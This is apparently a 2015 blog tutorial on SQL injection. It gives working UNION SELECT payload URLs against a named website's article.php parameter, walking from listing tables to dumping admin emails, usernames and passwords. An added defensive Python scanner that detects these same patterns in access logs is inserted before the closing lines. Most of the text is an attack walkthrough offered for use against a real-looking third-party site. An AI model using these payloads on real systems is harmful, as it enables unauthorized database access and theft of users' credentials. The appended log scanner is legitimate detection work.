Sunday 16 August 2015

SQL Injection - Tutorial - Database Version 5 and Above

Okay, so now we know the database version; next we need to get the table names.

To do so, add this at the end of the URL:

+UNION+SELECT+1,2,3,4,table_name,6,7,8,9,10,11 from information_schema.tables

NOTE: The column positions may differ in your case; in my case it's 1,2,3,4,table_name,... etc.

The URL should now look like this:

http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,2,3,4,table_name,6,7,8,9,10,11 from information_schema.tables

Now you should get the table information. Sometimes some of the table names will be cut off, because we are listing every table in information_schema. So here we want to restrict the query to the tables of the application's own database, instead of everything in information_schema.

If that is the case, add this at the end of the URL:

+UNION+SELECT+1,2,3,4,group_concat(table_name),6,7,8,9,10,11 from information_schema.tables+where+table_schema=database()

Now this should work and you should get all the table names :)
Some tables you may see are:

About, Admin, Admins, User, Users, Affiliates, Access, Customer, User, Login, terms, posts, etc.

Now we want to get the data from those tables. To do so, we change what we select in the vulnerable column from table_name to column_name.

So we add this at the end of the URL:

+UNION+SELECT+1,2,3,4,group_concat(column_name),6,7,8,9,10,11 from information_schema.columns+where+table_name=*table name*

So it should look like this:

http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,2,3,4,group_concat(column_name),6,7,8,9,10,11 from information_schema.columns+where+table_name=*table name*

Note: You can also use the hex-encoded table name here if you want to.

So now let's say we found an 'admin' table; we change the URL to:

http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,group_concat(column_name),3%20from%20information_schema.columns+where+table_name=admin

(You can change table_name=... to any table you want to get information from.)
Now you will be like, wtf? It didn't work. Well, that is because we didn't hex the table name.

So now, to hex the table name, go to:

Convert String To Hexadecimal Online to convert the name admin into hex data.

Now change the URL to:

http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,group_concat(column_name),3%20from%20information_schema.columns+where+table_name=0x61646d696e

admin is 61646d696e in hex, so I changed that at the end of the URL. NOTE: you have to add 0x before the hex digits.

Now that will give us all the columns of the table admin.

Now let's say we got the columns email, password and username. To get the data out of them:

Add the following at the end of the URL in the URL bar:

+UNION+SELECT+1,group_concat(email,0x3a,username,0x3a,password),3 from admin

So it should look like this:

http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,group_concat(email,0x3a,username,0x3a,password),3 from admin

So now you finally have the passwords, emails and usernames :)

Remember, if your tables are different you also have to change the names in the payloads I provided.
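As an added defender-side example (not part of the original post), here is a small Python scanner that looks for the exact fingerprint of this walkthrough in web-server access logs: UNION SELECT against information_schema, group_concat() and 0x hex literals in the query string. The log lines are constructed samples using documentation IP addresses, and the two-indicator threshold is an assumption chosen to avoid alerting on ordinary words like "union".

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not taken from the original post).
# Only the request target is inspected; the rest is typical access-log layout.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Aug/2015:10:01:02 +0000] "GET /article.php?id=616 HTTP/1.1" 200
203.0.113.5 - - [16/Aug/2015:10:01:09 +0000] "GET /article.php?id=-616+UNION+SELECT+1,2,3,4,table_name,6,7,8,9,10,11%20from%20information_schema.tables HTTP/1.1" 200
203.0.113.5 - - [16/Aug/2015:10:02:30 +0000] "GET /article.php?id=-616+UNION+SELECT+1,group_concat(column_name),3%20from%20information_schema.columns+where+table_name=0x61646d696e HTTP/1.1" 200
198.51.100.7 - - [16/Aug/2015:10:03:00 +0000] "GET /search.php?q=union+station HTTP/1.1" 200
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Each indicator corresponds to one ingredient of the walkthrough above.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{4,}\b", re.I),
}

def decode_target(line):
    """Return the URL-decoded request target of one log line, or None.

    unquote_plus turns both '+' and '%20' into spaces, so the two spacing
    styles seen in the tutorial collapse to the same text before matching."""
    m = REQUEST_RE.search(line)
    return unquote_plus(m.group(1)) if m else None

def score_line(line):
    """Return the set of indicator names that fire on one log line."""
    target = decode_target(line)
    if target is None:
        return set()
    return {name for name, rx in INDICATORS.items() if rx.search(target)}

def scan(log_text, min_indicators=2):
    """Return (line_no, client_ip, sorted indicators) for suspicious lines.

    Requiring two independent indicators keeps a benign word like 'union'
    in a search string from alerting on its own."""
    hits = []
    for no, line in enumerate(log_text.splitlines(), 1):
        found = score_line(line)
        if len(found) >= min_indicators:
            hits.append((no, line.split(" ", 1)[0], sorted(found)))
    return hits
```

Raising min_indicators to 4 isolates the fully developed requests (hex-encoded table name plus group_concat), which is the stage at which data is actually being pulled.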

Always think while hacking, don't just be a script kiddie ;D

Happy Hacking/Penetration testing ;)
